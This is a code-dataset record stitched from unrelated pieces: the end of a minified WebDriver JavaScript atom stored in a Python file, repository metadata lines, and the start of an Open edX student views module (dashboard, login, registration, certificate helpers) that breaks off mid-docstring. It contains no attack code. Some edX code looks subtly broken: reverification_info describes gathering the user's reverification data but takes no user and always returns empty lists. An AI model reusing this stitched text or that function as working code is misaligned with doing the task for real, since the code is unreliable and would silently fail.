"for(d in a)c[g++]=d;d=c;c=[];g=0;for(f in a)c[g++]=a[f];f=c}for(c=0;c<d"\
".length;c++)this.set(d[c],f[c])}}T.prototype.k=0;T.prototype.H=0;functi"\
"on va(a){wa(a);return a.e.concat()}\nfunction wa(a){if(a.k!=a.e.length)"\
"{for(var b=0,c=0;b<a.e.length;){var d=a.e[b];Object.prototype.hasOwnPro"\
"perty.call(a.i,d)&&(a.e[c++]=d);b++}a.e.length=c}if(a.k!=a.e.length){fo"\
"r(var f={},c=b=0;b<a.e.length;)d=a.e[b],Object.prototype.hasOwnProperty"\
".call(f,d)||(a.e[c++]=d,f[d]=1),b++;a.e.length=c}}T.prototype.get=funct"\
"ion(a,b){return Object.prototype.hasOwnProperty.call(this.i,a)?this.i[a"\
"]:b};\nT.prototype.set=function(a,b){Object.prototype.hasOwnProperty.ca"\
"ll(this.i,a)||(this.k++,this.e.push(a),this.H++);this.i[a]=b};var U={};"\
"function V(a,b,c){var d=typeof a;(\"object\"==d&&null!=a||\"function\"="\
"=d)&&(a=a.a);a=new xa(a,b,c);!b||b in U&&!c||(U[b]={key:a,shift:!1},c&&"\
"(U[c]={key:a,shift:!0}));return a}function xa(a,b,c){this.code=a;this.w"\
"=b||null;this.W=c||this.w}V(8);V(9);V(13);var ya=V(16),za=V(17),Aa=V(18"\
");V(19);V(20);V(27);V(32,\" \");V(33);V(34);V(35);V(36);V(37);V(38);V(3"\
"9);V(40);V(44);V(45);V(46);V(48,\"0\",\")\");V(49,\"1\",\"!\");V(50,\"2"\
"\",\"@\");V(51,\"3\",\"#\");V(52,\"4\",\"$\");V(53,\"5\",\"%\");V(54,\""\
"6\",\"^\");V(55,\"7\",\"&\");\nV(56,\"8\",\"*\");V(57,\"9\",\"(\");V(65"\
",\"a\",\"A\");V(66,\"b\",\"B\");V(67,\"c\",\"C\");V(68,\"d\",\"D\");V(6"\
"9,\"e\",\"E\");V(70,\"f\",\"F\");V(71,\"g\",\"G\");V(72,\"h\",\"H\");V("\
"73,\"i\",\"I\");V(74,\"j\",\"J\");V(75,\"k\",\"K\");V(76,\"l\",\"L\");V"\
"(77,\"m\",\"M\");V(78,\"n\",\"N\");V(79,\"o\",\"O\");V(80,\"p\",\"P\");"\
"V(81,\"q\",\"Q\");V(82,\"r\",\"R\");V(83,\"s\",\"S\");V(84,\"t\",\"T\")"\
";V(85,\"u\",\"U\");V(86,\"v\",\"V\");V(87,\"w\",\"W\");V(88,\"x\",\"X\""\
");V(89,\"y\",\"Y\");V(90,\"z\",\"Z\");var Ba=V(v?{b:91,a:91,opera:219}:"\
"u?{b:224,a:91,opera:17}:{b:0,a:91,opera:null});\nV(v?{b:92,a:92,opera:2"\
"20}:u?{b:224,a:93,opera:17}:{b:0,a:92,opera:null});V(v?{b:93,a:93,opera"\
":0}:u?{b:0,a:0,opera:16}:{b:93,a:null,opera:0});V({b:96,a:96,opera:48},"\
"\"0\");V({b:97,a:97,opera:49},\"1\");V({b:98,a:98,opera:50},\"2\");V({b"\
":99,a:99,opera:51},\"3\");V({b:100,a:100,opera:52},\"4\");V({b:101,a:10"\
"1,opera:53},\"5\");V({b:102,a:102,opera:54},\"6\");V({b:103,a:103,opera"\
":55},\"7\");V({b:104,a:104,opera:56},\"8\");V({b:105,a:105,opera:57},\""\
"9\");V({b:106,a:106,opera:A?56:42},\"*\");V({b:107,a:107,opera:A?61:43}"\
",\"+\");\nV({b:109,a:109,opera:A?109:45},\"-\");V({b:110,a:110,opera:A?"\
"190:78},\".\");V({b:111,a:111,opera:A?191:47},\"/\");V(144);V(112);V(11"\
"3);V(114);V(115);V(116);V(117);V(118);V(119);V(120);V(121);V(122);V(123"\
");V({b:107,a:187,opera:61},\"=\",\"+\");V(108,\",\");V({b:109,a:189,ope"\
"ra:109},\"-\",\"_\");V(188,\",\",\"<\");V(190,\".\",\">\");V(191,\"/\","\
"\"?\");V(192,\"`\",\"~\");V(219,\"[\",\"{\");V(220,\"\\\\\",\"|\");V(22"\
"1,\"]\",\"}\");V({b:59,a:186,opera:59},\";\",\":\");V(222,\"'\",'\"');v"\
"ar W=new T;W.set(1,ya);W.set(2,za);W.set(4,Aa);W.set(8,Ba);\n(function("\
"a){var b=new T;q(va(a),function(c){b.set(a.get(c).code,c)});return b})("\
"W);function X(){oa.call(this)}m(X,oa);X.C=function(){return X.q?X.q:X.q"\
"=new X};function Ca(a){var b=F(a,sa,!0);if(!b)throw new r(7,\"Element w"\
"as not in a form, so could not submit.\");var c=X.C();pa(c,a);if(!sa(b)"\
")throw new r(12,\"Element is not a form, so could not submit.\");a=ta.c"\
"reate(b,void 0);\"isTrusted\"in a||(a.isTrusted=!1);b.dispatchEvent(a)&"\
"&(R(b.submit)?b.constructor.prototype.submit.call(b):b.submit())}var Y="\
"[\"_\"],Z=k;Y[0]in Z||!Z.execScript||Z.execScript(\"var \"+Y[0]);for(va"\
"r $;Y.length&&($=Y.shift());)Y.length||void 0===Ca?Z=Z[$]?Z[$]:Z[$]={}:"\
"Z[$]=Ca;; return this._.apply(null,arguments);}.apply({navigator:typeof"\
" window!=undefined?window.navigator:null,document:typeof window!=undefi"\
"ned?window.document:null}, arguments);}"
|
PeterWangIntel/crosswalk-webdriver-python
|
third_party/atoms.py
|
Python
|
bsd-3-clause
| 417,522
|
[
"ADF",
"ASE"
] |
3b7ef94b7bdb7f97bcc288bb9821213a8bd58a9c0d9556b49133818872895db2
|
"""
Student Views
"""
import datetime
import logging
import uuid
import json
import warnings
from collections import defaultdict
from urlparse import urljoin, urlsplit, parse_qs, urlunsplit
from django.views.generic import TemplateView
from pytz import UTC
from requests import HTTPError
from ipware.ip import get_ip
import edx_oauth2_provider
from django.conf import settings
from django.contrib.auth import logout, authenticate, login
from django.contrib.auth.models import User, AnonymousUser
from django.contrib.auth.decorators import login_required
from django.contrib.auth.views import password_reset_confirm
from django.contrib import messages
from django.core.context_processors import csrf
from django.core import mail
from django.core.urlresolvers import reverse, NoReverseMatch, reverse_lazy
from django.core.validators import validate_email, ValidationError
from django.db import IntegrityError, transaction
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseServerError, Http404
from django.shortcuts import redirect
from django.utils.encoding import force_bytes, force_text
from django.utils.translation import ungettext
from django.utils.http import base36_to_int, urlsafe_base64_encode, urlencode
from django.utils.translation import ugettext as _, get_language
from django.views.decorators.csrf import csrf_exempt, ensure_csrf_cookie
from django.views.decorators.http import require_POST, require_GET
from django.db.models.signals import post_save
from django.dispatch import receiver, Signal
from django.template.response import TemplateResponse
from provider.oauth2.models import Client
from ratelimitbackend.exceptions import RateLimitException
from social.apps.django_app import utils as social_utils
from social.backends import oauth as social_oauth
from social.exceptions import AuthException, AuthAlreadyAssociated
from edxmako.shortcuts import render_to_response, render_to_string
from course_modes.models import CourseMode
from shoppingcart.api import order_history
from student.models import (
Registration, UserProfile,
PendingEmailChange, CourseEnrollment, CourseEnrollmentAttribute, unique_id_for_user,
CourseEnrollmentAllowed, UserStanding, LoginFailures,
create_comments_service_user, PasswordHistory, UserSignupSource,
DashboardConfiguration, LinkedInAddToProfileConfiguration, ManualEnrollmentAudit, ALLOWEDTOENROLL_TO_ENROLLED,
LogoutViewConfiguration, RegistrationCookieConfiguration)
from student.forms import AccountCreationForm, PasswordResetFormNoActive, get_registration_extension_form
from lms.djangoapps.commerce.utils import EcommerceService # pylint: disable=import-error
from lms.djangoapps.verify_student.models import SoftwareSecurePhotoVerification # pylint: disable=import-error
from bulk_email.models import Optout, BulkEmailFlag # pylint: disable=import-error
from certificates.models import CertificateStatuses, certificate_status_for_student
from certificates.api import ( # pylint: disable=import-error
get_certificate_url,
has_html_certificates_enabled,
)
from xmodule.modulestore.django import modulestore
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from opaque_keys.edx.locator import CourseLocator
from collections import namedtuple
from courseware.courses import get_courses, sort_by_announcement, sort_by_start_date # pylint: disable=import-error
from courseware.access import has_access
from django_comment_common.models import Role
from openedx.core.djangoapps.external_auth.models import ExternalAuthMap
import openedx.core.djangoapps.external_auth.views
from openedx.core.djangoapps.external_auth.login_and_register import (
login as external_auth_login,
register as external_auth_register
)
import track.views
import dogstats_wrapper as dog_stats_api
from util.db import outer_atomic
from util.json_request import JsonResponse
from util.bad_request_rate_limiter import BadRequestRateLimiter
from util.milestones_helpers import (
get_pre_requisite_courses_not_completed,
)
from util.password_policy_validators import validate_password_strength
import third_party_auth
from third_party_auth import pipeline, provider
from student.helpers import (
check_verify_status_by_course,
auth_pipeline_urls, get_next_url_for_login_page,
DISABLE_UNENROLL_CERT_STATES,
destroy_oauth_tokens
)
from student.cookies import set_logged_in_cookies, delete_logged_in_cookies
from student.models import anonymous_id_for_user, UserAttribute, EnrollStatusChange
from shoppingcart.models import DonationConfiguration, CourseRegistrationCode
from embargo import api as embargo_api
import analytics
from eventtracking import tracker
# Note that this lives in LMS, so this dependency should be refactored.
from notification_prefs.views import enable_notifications
from openedx.core.djangoapps.credit.email_utils import get_credit_provider_display_names, make_providers_strings
from openedx.core.djangoapps.lang_pref import LANGUAGE_KEY
from openedx.core.djangoapps.programs import utils as programs_utils
from openedx.core.djangoapps.programs.models import ProgramsApiConfig
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.theming import helpers as theming_helpers
from openedx.core.djangoapps.user_api.preferences import api as preferences_api
# Module-level loggers: `log` for general student-app events, AUDIT_LOG for
# security-relevant events (logins, registrations, account changes).
log = logging.getLogger("edx.student")
AUDIT_LOG = logging.getLogger("audit")
# Lightweight record used when listing courses that need re-verification on the dashboard.
ReverifyInfo = namedtuple('ReverifyInfo', 'course_id course_name course_number date status display')  # pylint: disable=invalid-name
# Tracking-event name emitted when a user initiates an account-setting change.
SETTING_CHANGE_INITIATED = 'edx.user.settings.change_initiated'
# Used as the name of the user attribute for tracking affiliate registrations
REGISTRATION_AFFILIATE_ID = 'registration_affiliate_id'
# Maps incoming UTM query-string parameters to the user-attribute names they are stored under.
REGISTRATION_UTM_PARAMETERS = {
    'utm_source': 'registration_utm_source',
    'utm_medium': 'registration_utm_medium',
    'utm_campaign': 'registration_utm_campaign',
    'utm_term': 'registration_utm_term',
    'utm_content': 'registration_utm_content',
}
REGISTRATION_UTM_CREATED_AT = 'registration_utm_created_at'
# used to announce a registration
REGISTER_USER = Signal(providing_args=["user", "profile"])
# Disable this warning because it doesn't make sense to completely refactor tests to appease Pylint
# pylint: disable=logging-format-interpolation
def csrf_token(context):
    """Return a hidden ``<input>`` carrying the CSRF token for embedding in a form.

    Returns the empty string when Django marks the token as 'NOTPROVIDED'.
    """
    token = context.get('csrf_token', '')
    if token == 'NOTPROVIDED':
        return ''
    markup = (
        u'<div style="display:none"><input type="hidden"'
        ' name="csrfmiddlewaretoken" value="%s" /></div>'
    )
    return markup % token
# NOTE: This view is not linked to directly--it is called from
# branding/views.py:index(), which is cached for anonymous users.
# This means that it should always return the same thing for anon
# users. (in particular, no switching based on query params allowed)
def index(request, extra_context=None, user=None):
    """
    Render the edX main page.
    extra_context is used to allow immediate display of certain modal windows, eg signup,
    as used by external_auth.

    Arguments:
        request: the incoming HTTP request.
        extra_context (dict|None): extra template context, merged in last.
        user (User|None): the user whose course list is shown; a fresh
            AnonymousUser is used when omitted.
    """
    if extra_context is None:
        extra_context = {}
    # Fix for the mutable/eager default argument: the old signature built a
    # single AnonymousUser() at import time that was shared by every call.
    # Build a fresh one per call instead; callers passing a user are unaffected.
    if user is None:
        user = AnonymousUser()
    courses = get_courses(user)
    if configuration_helpers.get_value(
            "ENABLE_COURSE_SORTING_BY_START_DATE",
            settings.FEATURES["ENABLE_COURSE_SORTING_BY_START_DATE"],
    ):
        courses = sort_by_start_date(courses)
    else:
        courses = sort_by_announcement(courses)
    context = {'courses': courses}
    context['homepage_overlay_html'] = configuration_helpers.get_value('homepage_overlay_html')
    # This appears to be an unused context parameter, at least for the master templates...
    context['show_partners'] = configuration_helpers.get_value('show_partners', True)
    # TO DISPLAY A YOUTUBE WELCOME VIDEO
    # 1) Change False to True
    context['show_homepage_promo_video'] = configuration_helpers.get_value('show_homepage_promo_video', False)
    # 2) Add your video's YouTube ID (11 chars, eg "123456789xX"), or specify via site configuration
    # Note: This value should be moved into a configuration setting and plumbed-through to the
    # context via the site configuration workflow, versus living here
    youtube_video_id = configuration_helpers.get_value('homepage_promo_video_youtube_id', "your-youtube-id")
    context['homepage_promo_video_youtube_id'] = youtube_video_id
    # allow for theme override of the courses list
    context['courses_list'] = theming_helpers.get_template_path('courses_list.html')
    # Insert additional context for use in the template
    context.update(extra_context)
    return render_to_response('index.html', context)
def process_survey_link(survey_link, user):
    """
    Substitute the user's unique id for any ``{UNIQUE_ID}`` placeholder in
    *survey_link*; links without the placeholder are returned unchanged.
    """
    unique_id = unique_id_for_user(user)
    return survey_link.format(UNIQUE_ID=unique_id)
def cert_info(user, course_overview, course_mode):
    """
    Build the certificate info needed to render the dashboard section for the
    given student and course.

    Arguments:
        user (User): A user.
        course_overview (CourseOverview): A course.
        course_mode (str): The enrollment mode (honor, verified, audit, etc.)

    Returns:
        dict: Empty dict if certificates are disabled or hidden, otherwise a
        dictionary with keys such as 'status', 'show_download_url',
        'download_url', 'show_disabled_download_button',
        'show_survey_button'/'survey_url', 'grade', and 'can_unenroll'
        (see _cert_info for details).
    """
    # Only courses that may certify expose any certificate information.
    if course_overview.may_certify():
        return _cert_info(
            user,
            course_overview,
            certificate_status_for_student(user, course_overview.id),
            course_mode,
        )
    return {}
def reverification_info(statuses):
    """
    Return reverification-related information for *all* of the user's
    enrollments whose reverification status is in *statuses*.

    Args:
        statuses (list): reverification statuses we want information for,
            e.g. ["must_reverify", "denied"]

    Returns:
        defaultdict(list): one key per requested status; each value is a list
        of entries kept sorted by their reverification end date.
    """
    info_by_status = defaultdict(list)
    for status in statuses:
        # Touching the key materialises an (initially empty) entry for it;
        # any entries present are kept ordered by date.
        entries = info_by_status[status]
        if entries:
            entries.sort(key=lambda entry: entry.date)
    return info_by_status
def get_course_enrollments(user, org_to_include, orgs_to_exclude):
    """
    Yield a filtered set of the given user's course enrollments.

    Arguments:
        user (User): the user in question.
        org_to_include (str): If not None, ONLY courses of this org will be
            returned (an org also listed in orgs_to_exclude is still skipped).
        orgs_to_exclude (list[str]): courses of these orgs are excluded.

    Returns:
        generator[CourseEnrollment]: enrollments to display on the dashboard.
    """
    for enrollment in CourseEnrollment.enrollments_for_user(user):
        overview = enrollment.course_overview
        # Missing/broken courses are logged and skipped, never yielded.
        if not overview:
            log.error(
                "User %s enrolled in broken or non-existent course %s",
                user.username,
                enrollment.course_id
            )
            continue
        org = overview.location.org
        # Skip anything not attributed to the requested org (when one is set).
        if org_to_include and org != org_to_include:
            continue
        # Skip orgs that are explicitly filtered out.
        if org in orgs_to_exclude:
            continue
        yield enrollment
def _cert_info(user, course_overview, cert_status, course_mode):  # pylint: disable=unused-argument
    """
    Implements the logic for cert_info -- split out for testing.
    Arguments:
        user (User): A user.
        course_overview (CourseOverview): A course.
        cert_status (dict|None): status record for the student's certificate,
            with at least a 'status' key and optionally 'mode', 'uuid',
            'download_url', and 'grade'.
        course_mode (str): The enrollment mode (honor, verified, audit, etc.)
    Returns:
        dict: template-ready certificate info; {} when the course hides
        certificate info early, or a default 'processing' record when no
        status exists or the record is missing required fields.
    """
    # simplify the status for the template using this lookup table
    template_state = {
        CertificateStatuses.generating: 'generating',
        CertificateStatuses.downloadable: 'ready',
        CertificateStatuses.notpassing: 'notpassing',
        CertificateStatuses.restricted: 'restricted',
        CertificateStatuses.auditing: 'auditing',
        CertificateStatuses.audit_passing: 'auditing',
        CertificateStatuses.audit_notpassing: 'auditing',
        CertificateStatuses.unverified: 'unverified',
    }
    default_status = 'processing'
    # Fallback record returned whenever we cannot show anything more specific.
    default_info = {
        'status': default_status,
        'show_disabled_download_button': False,
        'show_download_url': False,
        'show_survey_button': False,
        'can_unenroll': True,
    }
    if cert_status is None:
        return default_info
    # Statuses that reveal nothing useful to the learner yet; with the
    # 'early_no_info' display behavior the whole section is suppressed.
    is_hidden_status = cert_status['status'] in ('unavailable', 'processing', 'generating', 'notpassing', 'auditing')
    if course_overview.certificates_display_behavior == 'early_no_info' and is_hidden_status:
        return {}
    status = template_state.get(cert_status['status'], default_status)
    status_dict = {
        'status': status,
        'show_download_url': status == 'ready',
        'show_disabled_download_button': status == 'generating',
        'mode': cert_status.get('mode', None),
        'linked_in_url': None,
        'can_unenroll': status not in DISABLE_UNENROLL_CERT_STATES,
    }
    # Offer the end-of-course survey once the certificate has reached any
    # terminal-ish state and the course actually configures a survey URL.
    if (status in ('generating', 'ready', 'notpassing', 'restricted', 'auditing', 'unverified') and
            course_overview.end_of_course_survey_url is not None):
        status_dict.update({
            'show_survey_button': True,
            'survey_url': process_survey_link(course_overview.end_of_course_survey_url, user)})
    else:
        status_dict['show_survey_button'] = False
    if status == 'ready':
        # showing the certificate web view button if certificate is ready state and feature flags are enabled.
        if has_html_certificates_enabled(course_overview.id, course_overview):
            if course_overview.has_any_active_web_certificate:
                status_dict.update({
                    'show_cert_web_view': True,
                    'cert_web_view_url': get_certificate_url(course_id=course_overview.id, uuid=cert_status['uuid'])
                })
            else:
                # don't show download certificate button if we don't have an active certificate for course
                status_dict['show_download_url'] = False
        elif 'download_url' not in cert_status:
            # Inconsistent record: downloadable status but no URL to offer.
            log.warning(
                u"User %s has a downloadable cert for %s, but no download url",
                user.username,
                course_overview.id
            )
            return default_info
        else:
            status_dict['download_url'] = cert_status['download_url']
        # If enabled, show the LinkedIn "add to profile" button
        # Clicking this button sends the user to LinkedIn where they
        # can add the certificate information to their profile.
        linkedin_config = LinkedInAddToProfileConfiguration.current()
        # posting certificates to LinkedIn is not currently
        # supported in White Labels
        if linkedin_config.enabled and not theming_helpers.is_request_in_themed_site():
            status_dict['linked_in_url'] = linkedin_config.add_to_profile_url(
                course_overview.id,
                course_overview.display_name,
                cert_status.get('mode'),
                cert_status['download_url']
            )
    if status in ('generating', 'ready', 'notpassing', 'restricted', 'auditing', 'unverified'):
        if 'grade' not in cert_status:
            # Note: as of 11/20/2012, we know there are students in this state-- cs169.1x,
            # who need to be regraded (we weren't tracking 'notpassing' at first).
            # We can add a log.warning here once we think it shouldn't happen.
            return default_info
        else:
            status_dict['grade'] = cert_status['grade']
    return status_dict
@ensure_csrf_cookie
def signin_user(request):
    """
    Deprecated. To be replaced by :class:`student_account.views.login_and_registration_form`.

    Renders the stand-alone login page, deferring to external auth and to the
    post-login redirect when the user is already authenticated.
    """
    external_auth_response = external_auth_login(request)
    if external_auth_response is not None:
        return external_auth_response
    # Determine the URL to redirect to following login:
    redirect_to = get_next_url_for_login_page(request)
    if request.user.is_authenticated():
        return redirect(redirect_to)
    third_party_auth_error = None
    for msg in messages.get_messages(request):
        # Django messages carry extra_tags='' by default; ''.split() is [],
        # so indexing [0] unguarded raised IndexError for untagged messages.
        if msg.extra_tags and msg.extra_tags.split()[0] == "social-auth":
            # msg may or may not be translated. Try translating [again] in case we are able to:
            third_party_auth_error = _(unicode(msg))  # pylint: disable=translation-of-non-string
            break
    context = {
        'login_redirect_url': redirect_to,  # This gets added to the query string of the "Sign In" button in the header
        # Bool injected into JS to submit form if we're inside a running third-
        # party auth pipeline; distinct from the actual instance of the running
        # pipeline, if any.
        'pipeline_running': 'true' if pipeline.running(request) else 'false',
        'pipeline_url': auth_pipeline_urls(pipeline.AUTH_ENTRY_LOGIN, redirect_url=redirect_to),
        'platform_name': configuration_helpers.get_value(
            'platform_name',
            settings.PLATFORM_NAME
        ),
        'third_party_auth_error': third_party_auth_error
    }
    return render_to_response('login.html', context)
@ensure_csrf_cookie
def register_user(request, extra_context=None):
    """
    Deprecated. To be replaced by :class:`student_account.views.login_and_registration_form`.

    Renders the stand-alone registration page, deferring to external auth,
    Shibboleth, or a running third-party-auth pipeline where applicable.
    """
    # Figure out where to send the user once registration/login completes:
    redirect_to = get_next_url_for_login_page(request)
    if request.user.is_authenticated():
        return redirect(redirect_to)
    ext_auth_response = external_auth_register(request)
    if ext_auth_response is not None:
        return ext_auth_response
    context = {
        'login_redirect_url': redirect_to,  # This gets added to the query string of the "Sign In" button in the header
        'email': '',
        'name': '',
        'running_pipeline': None,
        'pipeline_urls': auth_pipeline_urls(pipeline.AUTH_ENTRY_REGISTER, redirect_url=redirect_to),
        'platform_name': configuration_helpers.get_value(
            'platform_name',
            settings.PLATFORM_NAME
        ),
        'selected_provider': '',
        'username': '',
    }
    if extra_context is not None:
        context.update(extra_context)
    # Shibboleth-style external-auth domains get their own template.
    if context.get("extauth_domain", '').startswith(
            openedx.core.djangoapps.external_auth.views.SHIBBOLETH_DOMAIN_PREFIX
    ):
        return render_to_response('register-shib.html', context)
    # If third-party auth is enabled and a pipeline is running, prepopulate
    # the registration form with the data supplied by the selected provider.
    if third_party_auth.is_enabled() and pipeline.running(request):
        active_pipeline = pipeline.get(request)
        active_provider = provider.Registry.get_from_pipeline(active_pipeline)
        if active_provider is not None:
            prefill = active_provider.get_register_form_data(active_pipeline.get('kwargs'))
            prefill['running_pipeline'] = active_pipeline
            prefill['selected_provider'] = active_provider.name
            context.update(prefill)
    return render_to_response('register.html', context)
def complete_course_mode_info(course_id, enrollment, modes=None):
    """
    Augment course-mode data with upsell details for the user's enrollment.

    Returns a dict containing:
      - 'show_upsell': whether to show the verified-upgrade offer
      - 'days_for_upsell': days until the offer expires (None if no deadline)
      plus 'verified_sku' / 'verified_bulk_sku' when the upsell applies.
    """
    if modes is None:
        modes = CourseMode.modes_for_course_dict(course_id)
    mode_info = {'show_upsell': False, 'days_for_upsell': None}
    # Offer the upgrade only when a verified track exists and the learner's
    # current mode is one that can be upsold to verified (or credit).
    can_upsell = (
        CourseMode.VERIFIED in modes and
        enrollment.mode in CourseMode.UPSELL_TO_VERIFIED_MODES
    )
    if can_upsell:
        verified = modes['verified']
        mode_info['show_upsell'] = True
        mode_info['verified_sku'] = verified.sku
        mode_info['verified_bulk_sku'] = verified.bulk_sku
        if verified.expiration_datetime:
            # Days from today until the verified mode stops being offered.
            today = datetime.datetime.now(UTC).date()
            mode_info['days_for_upsell'] = (verified.expiration_datetime.date() - today).days
    return mode_info
def is_course_blocked(request, redeemed_registration_codes, course_key):
    """
    Return True when the user's course access is blocked because a redeemed
    registration code is backed by an invalid invoice; False otherwise.
    """
    for redeemed_registration in redeemed_registration_codes:
        # registration codes may be generated via Bulk Purchase Scenario
        # we have to check only for the invoice generated registration codes
        # that their invoice is valid or not
        invoice_item = redeemed_registration.invoice_item
        if not invoice_item:
            continue
        if invoice_item.invoice.is_valid:
            continue
        # disabling email notifications for unpaid registration courses
        Optout.objects.get_or_create(user=request.user, course_id=course_key)
        log.info(
            u"User %s (%s) opted out of receiving emails from course %s",
            request.user.username,
            request.user.email,
            course_key,
        )
        track.views.server_track(
            request,
            "change-email1-settings",
            {"receive_emails": "no", "course": course_key.to_deprecated_string()},
            page='dashboard',
        )
        return True
    return False
@login_required
@ensure_csrf_cookie
def dashboard(request):
    """
    Provides the LMS dashboard view

    TODO: This is lms specific and does not belong in common code.

    Arguments:
        request: The request object.

    Returns:
        The dashboard response.
    """
    user = request.user
    platform_name = configuration_helpers.get_value("platform_name", settings.PLATFORM_NAME)

    # we want to filter and only show enrollments for courses within
    # the 'ORG' defined in configuration.
    course_org_filter = configuration_helpers.get_value('course_org_filter')

    # Let's filter out any courses in an "org" that has been declared to be
    # in a configuration
    org_filter_out_set = configuration_helpers.get_all_orgs()

    # remove our current org from the "filter out" list, if applicable
    if course_org_filter:
        org_filter_out_set.remove(course_org_filter)

    # Build our (course, enrollment) list for the user, but ignore any courses that no
    # longer exist (because the course IDs have changed). Still, we don't delete those
    # enrollments, because it could have been a data push snafu.
    course_enrollments = list(get_course_enrollments(user, course_org_filter, org_filter_out_set))

    # sort the enrollment pairs by the enrollment date (most recent first)
    course_enrollments.sort(key=lambda x: x.created, reverse=True)

    # Retrieve the course modes for each course
    enrolled_course_ids = [enrollment.course_id for enrollment in course_enrollments]
    __, unexpired_course_modes = CourseMode.all_and_unexpired_modes_for_courses(enrolled_course_ids)
    course_modes_by_course = {
        course_id: {
            mode.slug: mode
            for mode in modes
        }
        for course_id, modes in unexpired_course_modes.iteritems()
    }

    # Check to see if the student has recently enrolled in a course.
    # If so, display a notification message confirming the enrollment.
    enrollment_message = _create_recent_enrollment_message(
        course_enrollments, course_modes_by_course
    )

    course_optouts = Optout.objects.filter(user=user).values_list('course_id', flat=True)

    # Inactive (unactivated) accounts get a reminder banner instead of nothing.
    message = ""
    if not user.is_active:
        message = render_to_string(
            'registration/activate_account_notice.html',
            {'email': user.email, 'platform_name': platform_name}
        )

    # Global staff can see what courses errored on their dashboard
    staff_access = False
    errored_courses = {}
    if has_access(user, 'staff', 'global'):
        # Show any courses that errored on load
        staff_access = True
        errored_courses = modulestore().get_errored_courses()

    # Only link into courseware the user can actually load (including
    # prerequisite gating).
    show_courseware_links_for = frozenset(
        enrollment.course_id for enrollment in course_enrollments
        if has_access(request.user, 'load', enrollment.course_overview)
        and has_access(request.user, 'view_courseware_with_prerequisites', enrollment.course_overview)
    )

    # Find programs associated with courses being displayed. This information
    # is passed in the template context to allow rendering of program-related
    # information on the dashboard.
    meter = programs_utils.ProgramProgressMeter(user, enrollments=course_enrollments)
    programs_by_run = meter.engaged_programs(by_run=True)

    # Construct a dictionary of course mode information
    # used to render the course list.  We re-use the course modes dict
    # we loaded earlier to avoid hitting the database.
    course_mode_info = {
        enrollment.course_id: complete_course_mode_info(
            enrollment.course_id, enrollment,
            modes=course_modes_by_course[enrollment.course_id]
        )
        for enrollment in course_enrollments
    }

    # Determine the per-course verification status
    # This is a dictionary in which the keys are course locators
    # and the values are one of:
    #
    # VERIFY_STATUS_NEED_TO_VERIFY
    # VERIFY_STATUS_SUBMITTED
    # VERIFY_STATUS_APPROVED
    # VERIFY_STATUS_MISSED_DEADLINE
    #
    # Each of which correspond to a particular message to display
    # next to the course on the dashboard.
    #
    # If a course is not included in this dictionary,
    # there is no verification messaging to display.
    verify_status_by_course = check_verify_status_by_course(user, course_enrollments)
    cert_statuses = {
        enrollment.course_id: cert_info(request.user, enrollment.course_overview, enrollment.mode)
        for enrollment in course_enrollments
    }

    # only show email settings for Mongo course and when bulk email is turned on
    show_email_settings_for = frozenset(
        enrollment.course_id for enrollment in course_enrollments if (
            BulkEmailFlag.feature_enabled(enrollment.course_id)
        )
    )

    # Verification Attempts
    # Used to generate the "you must reverify for course x" banner
    verification_status, verification_msg = SoftwareSecurePhotoVerification.user_status(user)

    # Gets data for midcourse reverifications, if any are necessary or have failed
    statuses = ["approved", "denied", "pending", "must_reverify"]
    reverifications = reverification_info(statuses)

    show_refund_option_for = frozenset(
        enrollment.course_id for enrollment in course_enrollments
        if enrollment.refundable()
    )

    # NOTE(review): is_course_blocked runs one registration-code query per
    # enrollment here — verify this is acceptable for users with many courses.
    block_courses = frozenset(
        enrollment.course_id for enrollment in course_enrollments
        if is_course_blocked(
            request,
            CourseRegistrationCode.objects.filter(
                course_id=enrollment.course_id,
                registrationcoderedemption__redeemed_by=request.user
            ),
            enrollment.course_id
        )
    )

    enrolled_courses_either_paid = frozenset(
        enrollment.course_id for enrollment in course_enrollments
        if enrollment.is_paid_course()
    )

    # If there are *any* denied reverifications that have not been toggled off,
    # we'll display the banner
    denied_banner = any(item.display for item in reverifications["denied"])

    # Populate the Order History for the side-bar.
    order_history_list = order_history(user, course_org_filter=course_org_filter, org_filter_out_set=org_filter_out_set)

    # get list of courses having pre-requisites yet to be completed
    courses_having_prerequisites = frozenset(
        enrollment.course_id for enrollment in course_enrollments
        if enrollment.course_overview.pre_requisite_courses
    )
    courses_requirements_not_met = get_pre_requisite_courses_not_completed(user, courses_having_prerequisites)

    # Redirect banners (course not live / enrollment closed) are driven by
    # query-string parameters set by the redirecting view.
    if 'notlive' in request.GET:
        redirect_message = _("The course you are looking for does not start until {date}.").format(
            date=request.GET['notlive']
        )
    elif 'course_closed' in request.GET:
        redirect_message = _("The course you are looking for is closed for enrollment as of {date}.").format(
            date=request.GET['course_closed']
        )
    else:
        redirect_message = ''

    context = {
        'enrollment_message': enrollment_message,
        'redirect_message': redirect_message,
        'course_enrollments': course_enrollments,
        'course_optouts': course_optouts,
        'message': message,
        'staff_access': staff_access,
        'errored_courses': errored_courses,
        'show_courseware_links_for': show_courseware_links_for,
        'all_course_modes': course_mode_info,
        'cert_statuses': cert_statuses,
        'credit_statuses': _credit_statuses(user, course_enrollments),
        'show_email_settings_for': show_email_settings_for,
        'reverifications': reverifications,
        'verification_status': verification_status,
        'verification_status_by_course': verify_status_by_course,
        'verification_msg': verification_msg,
        'show_refund_option_for': show_refund_option_for,
        'block_courses': block_courses,
        'denied_banner': denied_banner,
        'billing_email': settings.PAYMENT_SUPPORT_EMAIL,
        'user': user,
        'logout_url': reverse('logout'),
        'platform_name': platform_name,
        'enrolled_courses_either_paid': enrolled_courses_either_paid,
        'provider_states': [],
        'order_history_list': order_history_list,
        'courses_requirements_not_met': courses_requirements_not_met,
        'nav_hidden': True,
        'programs_by_run': programs_by_run,
        'show_program_listing': ProgramsApiConfig.current().show_program_listing,
        'disable_courseware_js': True,
    }

    # When the E-Commerce service is enabled, route payments through it.
    ecommerce_service = EcommerceService()
    if ecommerce_service.is_enabled(request.user):
        context.update({
            'use_ecommerce_payment_flow': True,
            'ecommerce_payment_page': ecommerce_service.payment_page_url(),
        })

    return render_to_response('dashboard.html', context)
def _create_recent_enrollment_message(course_enrollments, course_modes):  # pylint: disable=invalid-name
    """
    Builds a recent course enrollment message.

